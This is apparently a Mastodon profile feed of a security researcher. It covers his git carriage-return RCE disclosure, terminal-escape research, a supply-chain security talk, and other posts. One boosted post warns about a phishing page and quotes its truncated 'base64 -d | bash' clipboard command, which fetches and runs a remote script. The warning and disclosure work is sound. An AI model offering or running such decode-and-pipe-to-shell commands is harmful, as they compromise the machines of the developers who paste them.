Mastodawn

My first introduction to @dgl was finding https://dgl.cx/2023/09/ansi-terminal-security on my own and then being surprised he was a co-worker!

I got to sit down with him and chat about the recent git CVE he discovered and a lot more in our recent podcast episode.

If you don't have time for that, here's 5 minutes on the vulnerabililty specifically, cut from that interview: https://youtu.be/XZHxE3iWPMU

"[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

David Leadbeater Jul 31

I'll be speaking at BSides Canberra: https://cfp.bsidescbr.com.au/bsides-canberra-2025/talk/8TWF8X/ -- this will cover my recent find of an RCE in Git and how that and some other vulnerabilities could be used against developers. #bsides #security

Developers, the weakest link in the supply chain? BSides Canberra 2025

Supply chain security is a topic which has been raised in profile in recent years through events such as the xz backdoor. In the open source world trust matters a lot. While trust is mostly gained through social interactions, it is also important to trust the tools themselves. This talk will detail how I found several holes in common tools, leading to the potential for attacks against developer's tooling.

David Leadbeater Jul 17

Filippo Valsorda Jul 17

This is pretty well executed phishing.

The Copy button copies to the clipboard

echo "Y3Vy[...]ggJg==" | base64 -d | bash

which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.

They even detect piping, so to read it you have to run "curl | cat".

David Leadbeater Jul 11

Oriel Jutty

Jul 10

Dammit, mst. I owe you. You welcomed me to the community, you inspired me, you made me laugh, and you nudged me in the right direction when I said some dumb shit. You didn't even permaban me when I flooded #perl with a kilobyte of combining Unicode characters. I still can't believe you're just ... gone. I wanted to talk to you again.

https://www.shadowcat.co.uk/2025/07/09/ripples-they-cause-in-the-world/

“Ripples They Cause in the World” – Shadowcat Systems Limited

David Leadbeater Jul 9

I found a vulnerability in git. CVE-2025-48384: Breaking git with a carriage return and cloning RCE - https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384

As the post explains this is one of my favourite classes of vulnerability, using characters that are old and sometimes forgotten.

#git #security #rce #ascii

CVE-2025-48384: Breaking Git with a carriage return and cloning RCE

David Leadbeater Jan 29

🍋‍🟩 The ChatGPT app can happily render a lime, but it insists it doesn't exist.

David Leadbeater Jan 16

If only solving my problem was this simple.

David Leadbeater Jan 1

Mitchell Hashimoto Dec 31, 2024

Ghostty 1.0.1 is out to address the most common issues people ran into with the initial release. An incredible amount of improvements mostly from contributors over the past 96 hours! ❤️ Please note there are two security advisories. https://ghostty.org/docs/install/release-notes/1-0-1